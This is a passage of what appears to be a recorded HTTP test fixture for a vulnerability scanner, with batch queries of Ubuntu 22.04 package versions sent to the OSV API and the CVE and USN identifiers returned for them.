{ "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14321 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "fzf" }, "version": "0.29.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.18.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 17153 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": 